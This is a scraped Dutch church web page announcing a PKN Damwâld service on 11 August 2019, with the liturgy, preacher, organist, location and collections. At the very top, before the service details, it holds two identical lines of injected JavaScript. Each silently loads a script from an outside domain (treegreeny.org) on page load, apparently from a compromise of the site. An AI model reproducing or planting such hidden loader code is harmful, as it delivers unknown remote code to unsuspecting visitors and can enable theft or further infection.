;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 11 augustus 2019 14:00 uur - PKN Damwâld
zondag 11 augustus 2019
14:00 uur

Kerkdienst zondag 11 augustus 2019 14:00 uur

Thema: “De Barmhartige Samaritaan”

Informatie

Voorganger:Ds. A. Elverdink, Raard-Foudgum c.a.
Organist:Jelte Cuperus
Thema:“De Barmhartige Samaritaan”
Liturgie
Lied voor de dienst Gezang 470
Welkom
We zingen: Intochtpsalm 138: 1
Onze Hulp en Groet
We zingen: Psalm 138: 4
Gebed
We lezen: Lukas 10: 25 - 37
We zingen: Evangelische Liedbundel 297
Preek .
We zingen: Psalm 103: 3, 5
Geloofsbelijdenis
We zingen: Evangelische Liedbundel 140
Gebeden
Collecte
We zingen: Gezang 92: 1, 5, 6
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Diaconaal doel
Tweede collecte: Kerk
Uitganscollecte: Kerk